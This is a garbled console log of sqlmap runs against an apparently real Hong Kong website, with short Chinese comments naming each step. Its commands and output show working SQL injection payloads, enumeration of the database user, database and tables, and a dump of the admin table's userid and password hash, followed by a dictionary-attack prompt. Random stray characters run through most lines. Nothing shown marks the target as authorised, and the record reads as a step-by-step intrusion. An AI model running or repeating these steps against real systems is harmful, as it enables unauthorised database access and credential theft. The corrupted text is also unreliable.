D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
' ~) _0 X, C( Cms "Mysql" --current-user /* 注解:获取当前用户名称! p( m% p# [8 \1 r4 A6 M) m
sqlmap/0.9 - automatic SQL injection and database takeover tool, I& G0 x7 }: Y; s. n0 i& n
http://sqlmap.sourceforge.net starting at: 16:53:54
& c0 ^- |% b; |+ v; T7 s/ B5 K[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as+ }- T2 {' m. [* V# ^2 }
session file2 o/ A0 G c# \$ V1 @( S: f
[16:53:54] [INFO] resuming injection data from session file. H! j' U2 h; z8 f% j: ^- P& a
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
+ R( N# S5 y) h+ l$ B6 j: [3 K! @[16:53:54] [INFO] testing connection to the target url
7 {$ G( S, E" `$ Ssqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 x' Z' {. P. |sts:
8 Y8 v' y/ E& f% `& W---
4 p2 P: x7 K" C1 s6 {Place: GET, j( K- y4 u% D0 Y
Parameter: id$ u6 H' o3 j. j7 S
Type: boolean-based blind9 d3 {+ y( L" ?4 ?8 z9 z
Title: AND boolean-based blind - WHERE or HAVING clause
3 u& J, `' H1 ~/ Z1 \ Payload: id=276 AND 799=799
" ^# X( N1 i; w. _" I& r$ `- o- e) T Type: error-based$ y) Q+ z" D# ?2 ~1 K
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
% Y5 f8 d( R: c- k9 y Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
- ` y2 K; {' k. A% j120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
3 q7 h( }$ s: T) n3 C. {),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)! @2 F. F4 d% L$ b
Type: UNION query7 _: P4 z+ i! Q4 L8 h
Title: MySQL UNION query (NULL) - 1 to 10 columns% Z4 p- a# D- W1 a# A
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
9 G$ m6 ]- r- E(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
~. d3 `5 |( d [CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) N. H/ f, N2 r& v
Type: AND/OR time-based blind
* H1 x+ P3 W. V6 ~/ r Title: MySQL > 5.0.11 AND time-based blind9 d8 W8 r. `$ ~
Payload: id=276 AND SLEEP(5)2 \ P- s+ K% ^& v# ~' W. s
---2 Y' T2 F2 ?- N* I
[16:53:55] [INFO] the back-end DBMS is MySQL) t) [; {% q1 @9 f4 M9 Z
web server operating system: Windows, c1 I6 G5 U- t2 n/ `
web application technology: Apache 2.2.11, PHP 5.3.0& T9 Z1 Y+ l- E I: z* l
back-end DBMS: MySQL 5.0: T0 R: l- W1 O. D
[16:53:55] [INFO] fetching current user
) }+ K! A. C l, U$ b1 lcurrent user: 'root@localhost'
1 Z0 \7 W8 a- f& k[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou# [+ w% l) ]! U- s' [2 f
tput\www.wepost.com.hk' shutting down at: 16:53:58) e# d/ R5 Y8 L% l
, v* v# n/ _; j) w
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
* O0 X2 L6 F- }) \% }4 d& Jms "Mysql" --current-db /*当前数据库
4 U7 N w+ r- M" H$ J sqlmap/0.9 - automatic SQL injection and database takeover tool6 a! h& Y. X+ z4 i; |7 o# u6 x, c# z
http://sqlmap.sourceforge.net starting at: 16:54:16
3 v) h9 H* r! J/ V& I$ \( R1 L# G[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# n" V5 Y' X0 \# v4 T6 A
session file' g" f& O0 F' T$ ~( D' U$ C
[16:54:16] [INFO] resuming injection data from session file- Q8 U/ e, z' g" S
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file$ |* f5 G0 X: I6 m* y* n' g
[16:54:16] [INFO] testing connection to the target url
* w# S- ^! U# @3 E; \+ S: O" jsqlmap identified the following injection points with a total of 0 HTTP(s) reque0 q/ ]0 ~2 f8 F- h
sts:0 ^0 n5 F) z) l- }
---
. Z) P* ]5 ?# E! R8 ]Place: GET% C, ?" e: }% _1 U- i3 W. b7 t
Parameter: id# ~" ^/ k! d h" d% ?0 \- y
Type: boolean-based blind
3 J O( a- T4 E' r Title: AND boolean-based blind - WHERE or HAVING clause
( ^7 ~8 n& R% l: A, M5 Y Payload: id=276 AND 799=799
+ p$ D' V p; v. v: ], S Type: error-based
: @- d6 \# z6 S% \ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause/ y; H% H: g: A( J
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
3 J5 K7 Y0 _+ H" Q# ]% d120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! G8 f2 G" O7 P$ o& N n: e
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
# n9 Y' d% S. E% o# h" e Type: UNION query# Q/ i; k' D! W. R4 o
Title: MySQL UNION query (NULL) - 1 to 10 columns
6 d8 E3 p& _* D! J. N& I Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR4 r# y1 [: Y& Y
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ r. }6 |5 S# i" s3 k# \
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
7 y" J' m7 U) U6 X0 r Type: AND/OR time-based blind1 N5 s; L# y3 ]
Title: MySQL > 5.0.11 AND time-based blind4 X$ P# z( c5 ^6 ]) j2 m" t7 p
Payload: id=276 AND SLEEP(5)
2 \% `% P6 x+ ^3 o. M---0 q, H& R, J: N
[16:54:17] [INFO] the back-end DBMS is MySQL
7 p4 p- W* @2 Qweb server operating system: Windows2 R1 }7 f+ t! a5 L* f" @
web application technology: Apache 2.2.11, PHP 5.3.0% u. f' [3 |7 ]7 {
back-end DBMS: MySQL 5.07 Y4 _* d- h: v" ?% a
[16:54:17] [INFO] fetching current database
* c6 `; Q/ X2 L0 u; n/ |( ]4 m# L( Ecurrent database: 'wepost'" d. H: f$ Y. G0 p a% k- h
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou# h$ Q' D& L7 N' I* U4 }# d
tput\www.wepost.com.hk' shutting down at: 16:54:183 ?- ^" j7 v e5 B
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db- \0 L' s2 }) P& }8 j) j
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名: E9 w. }5 {, c3 n) D
sqlmap/0.9 - automatic SQL injection and database takeover tool
6 |9 c2 B* }8 s+ ^1 `( s+ U http://sqlmap.sourceforge.net starting at: 16:55:25
3 E( d' }1 L" z4 E$ B[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as9 i3 |: i& \: p H1 H
session file( A- t7 @$ u @8 v" h; }: o* p
[16:55:25] [INFO] resuming injection data from session file
8 Y. `' l' B+ J0 c0 z, U[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file+ S; _# f6 |* N
[16:55:25] [INFO] testing connection to the target url
B" n* T: z: A! Isqlmap identified the following injection points with a total of 0 HTTP(s) reque9 x1 p4 x& b" N/ D/ @0 s' Z
sts:: D$ I( F4 o/ [, z* r0 K5 c
---" x) {" w- x( o0 c `$ f& z
Place: GET
4 I4 N/ Y& u9 i8 t, U" @5 x8 X+ sParameter: id; Q( q9 H( k( n. n9 }; g
Type: boolean-based blind
1 w" K+ B- o& A$ z6 ] Title: AND boolean-based blind - WHERE or HAVING clause
" C; O' j+ ?% p6 D Payload: id=276 AND 799=799
9 _1 }/ g$ I5 D1 }$ i Type: error-based- n* n" l" ?& C; k- |" H
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
7 Z$ e* | R- ]' x! {, c# j1 i5 T Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; x7 k; Y+ b/ {% h. [
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58, K/ u2 {# M( z: v0 S. X9 a; Q
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
. I: q. n# j6 }4 V Type: UNION query- \* Q4 F( i+ p: {* R
Title: MySQL UNION query (NULL) - 1 to 10 columns7 F( V" \3 H% q3 u8 H) {
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
& s6 H- G I: `2 b: N9 X(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),3 V/ N3 j& w0 L8 D
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
9 K L+ G7 Y! o& }2 G0 { Type: AND/OR time-based blind9 Z* f# w+ |1 ^! {
Title: MySQL > 5.0.11 AND time-based blind
3 |: N9 a( D3 j' ?% i9 o Payload: id=276 AND SLEEP(5)
8 s3 z" m0 r8 @) h8 D9 |---
j) v% i! M+ I" W0 i" ]' M( r K2 ][16:55:26] [INFO] the back-end DBMS is MySQL9 M+ |0 Q- G! a
web server operating system: Windows
. t8 k# J* Z/ V, F M" G: xweb application technology: Apache 2.2.11, PHP 5.3.0 m5 t3 c) q) z c9 G2 i
back-end DBMS: MySQL 5.0
8 V- U8 k4 b2 E2 y[16:55:26] [INFO] fetching tables for database 'wepost'# d( i6 F$ ?* q) {
[16:55:27] [INFO] the SQL query used returns 6 entries
# A! M6 B0 Y4 ]7 A+ E5 ODatabase: wepost7 x1 w9 g, V0 Y# N+ L
[6 tables]
% d; _: x- f% C1 M g0 P% M+-------------+! j E9 z/ P6 ^+ o+ X+ F& T
| admin |% H' n% @; G& q# z* R
| article |# [5 V- N; l+ o6 X# `
| contributor |; F) D& r1 ^1 Z4 F5 [9 [+ z
| idea |
# a7 z; b3 Z6 ? w# x$ r8 T: F| image |+ _; e+ V! g1 u2 @4 s9 L
| issue |' Z x1 e7 J# f" H( ?0 V5 `: N& C
+-------------+
6 w1 H# y0 v6 f$ ^! B[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou" \6 d) j0 D5 P1 d: D5 _7 ^/ d
tput\www.wepost.com.hk' shutting down at: 16:55:33
! I/ h' h( N6 Z0 b$ D7 D$ S$ f. w0 O& V, j* |5 N, c
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
+ e" ~* E- G9 ]* g) E4 E# |7 P; T Nms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
- h9 A- B, i0 S2 ^( W sqlmap/0.9 - automatic SQL injection and database takeover tool3 Q; i5 u0 ~1 H h2 r: y4 p
http://sqlmap.sourceforge.net starting at: 16:56:06
6 y X" F \" [$ F4 ]sqlmap identified the following injection points with a total of 0 HTTP(s) reque
$ u8 m: O* Q L% Z5 Z( D6 a( Osts: f: o( W. x4 S+ Q" g5 \- l4 a3 O$ Y
---: D5 o& u. b! s& e/ @6 a/ N
Place: GET. h9 Z# C: m% @3 x m1 u
Parameter: id
7 x# S3 ^6 v9 y$ l Type: boolean-based blind
9 Z# a9 `, [" n7 \9 F$ N Title: AND boolean-based blind - WHERE or HAVING clause
- L! q$ R. u4 F- w- P1 M& E Payload: id=276 AND 799=799
* w0 Y: |' c) n3 B+ `! [1 s9 D9 O Type: error-based. G, K2 x2 a' j/ n& j" i' e( o
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause. E+ y& k. {+ ?- \: x) m
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,: v# G1 t( D. I# b/ [: _
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58) z" W. S& s0 M. V7 K. F4 O
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ R# O0 Y, R( l$ I6 M
Type: UNION query* |) ]) w+ D6 I, K1 g- E* |0 D1 r
Title: MySQL UNION query (NULL) - 1 to 10 columns6 J$ O% i3 x$ X
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) D0 ], W" {! @
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
* m5 F: y- V- \6 `; x6 W/ g, J" TCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#% j1 B0 S% I/ K5 @3 w
Type: AND/OR time-based blind
$ F4 p7 s) O& ?2 X# }7 Q Title: MySQL > 5.0.11 AND time-based blind; F$ G5 O; i' ^( f' ~! a
Payload: id=276 AND SLEEP(5) Q$ ?9 X* N2 F
---
/ X5 | t* S! |0 u2 }8 }1 Bweb server operating system: Windows
' c* Y7 W* O- X: d" b1 tweb application technology: Apache 2.2.11, PHP 5.3.0
# J$ S5 _' b1 F& }" U3 x( [) dback-end DBMS: MySQL 5.0! w" K* X$ W' H j; ^/ ~7 N% q
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
0 k5 [. K4 A7 |8 [3 x' Jssion': wepost, wepost$ m0 L, {# O+ I4 n. O
Database: wepost
. j; \- B0 V) ^3 j/ _/ ]! kTable: admin: r: N, ?2 F+ |. o; Z
[4 columns]
" g1 k- ?1 h/ A! R+----------+-------------+$ W# Q( |) f6 w) d" T7 ^8 C
| Column | Type |
3 x- j4 p Q: ~( [1 M8 R- w7 c+ {+----------+-------------+9 u V+ }! N1 S1 Y# B5 B
| id | int(11) |
4 O; @$ B/ ?! ^8 q+ U/ R# U# @| password | varchar(32) |
; B( t2 D# s6 R1 E3 X| type | varchar(10) |6 f! t$ ?( r2 b% K1 O) C
| userid | varchar(20) |5 c3 w/ d3 }5 k9 R8 q9 u* s( f: G
+----------+-------------+0 E2 T7 P( ]: n* P; ^" H1 ^
shutting down at: 16:56:192 z( N/ J9 R2 o% c3 n' c# K( q
- f7 e0 ?; D3 w, p9 R _! @1 H
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db1 w- A! [3 o* K# Y- o
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容/ m0 P) e$ f- F& M0 L
sqlmap/0.9 - automatic SQL injection and database takeover tool
& m6 b/ S7 f( @, U0 p) z! ? http://sqlmap.sourceforge.net starting at: 16:57:146 r' V n2 E& V
sqlmap identified the following injection points with a total of 0 HTTP(s) reque* E3 ~- O0 [% r* v( R
sts:
, ^6 C7 c( y5 W5 k$ m% g---$ C, M5 Z. D: G* ]2 z( I
Place: GET
2 ~, j+ U7 s1 o8 x# K- m! eParameter: id
" ]! R2 N+ h8 H' n8 Q Type: boolean-based blind
: y6 o& a( D; v0 }% ? Title: AND boolean-based blind - WHERE or HAVING clause, C" t1 K2 [3 {- A
Payload: id=276 AND 799=799: u2 H E" n' y: ^; E5 ?2 O
Type: error-based& V( ^: {- Y$ B% l6 E
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause" d0 ^% o3 E6 D
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
G, o, J7 C4 x4 g' X2 a6 f120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
* |& v2 x; B* M) T; Q4 q! e$ I),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)0 Q9 V) ]0 }; |. b9 ~2 N( d6 [! G! q8 f) M
Type: UNION query
# J/ R% j2 F% @; T# n, @ Title: MySQL UNION query (NULL) - 1 to 10 columns* W* p7 {6 D: Q
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
. l$ x# E. ?+ z1 g' p; H$ v(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),: f. J: B1 M* j% }5 z
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#( ]. l4 ], K* x, Q; n! D
Type: AND/OR time-based blind* [4 a6 R- E( X O \+ S
Title: MySQL > 5.0.11 AND time-based blind
& `6 L+ I# r. V+ M1 S Payload: id=276 AND SLEEP(5)# f9 B3 K) s' |! F& R" `) m
---( W, C0 k8 r& q3 V& \; l
web server operating system: Windows3 f+ U+ M4 A q0 j" r
web application technology: Apache 2.2.11, PHP 5.3.0
. m/ k; J8 I9 Y/ M. n/ m' `1 Jback-end DBMS: MySQL 5.0
- V5 L! ^0 N: D! Qrecognized possible password hash values. do you want to use dictionary attack o
( Z2 n) X$ d* qn retrieved table items? [Y/n/q] y
. l# {) h: t$ e' g/ |$ hwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
! e! }0 M: C* j G$ ^7 bdo you want to use common password suffixes? (slow!) [y/N] y3 x3 n" n6 _8 G" x: d; a7 b
Database: wepost
0 U% m* ~) j: r1 D: a% i* }Table: admin
* v6 r$ j- l- b& X/ ]6 w8 j9 L: Y[1 entry]
" u! f% _9 A& b1 o+----------------------------------+------------+
% L8 U& W1 a& D' [7 H8 l% || password | userid |
: q/ K6 t( D; z: \9 L, ~+----------------------------------+------------+
4 f. Y$ T( l5 F l) \| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |- ?1 \) |# _6 G3 y
+----------------------------------+------------+
4 { t3 W- |& g" L f4 E/ c shutting down at: 16:58:149 w& E* m6 z. n
! p; b6 ]/ ~' OD:\Python27\sqlmap> |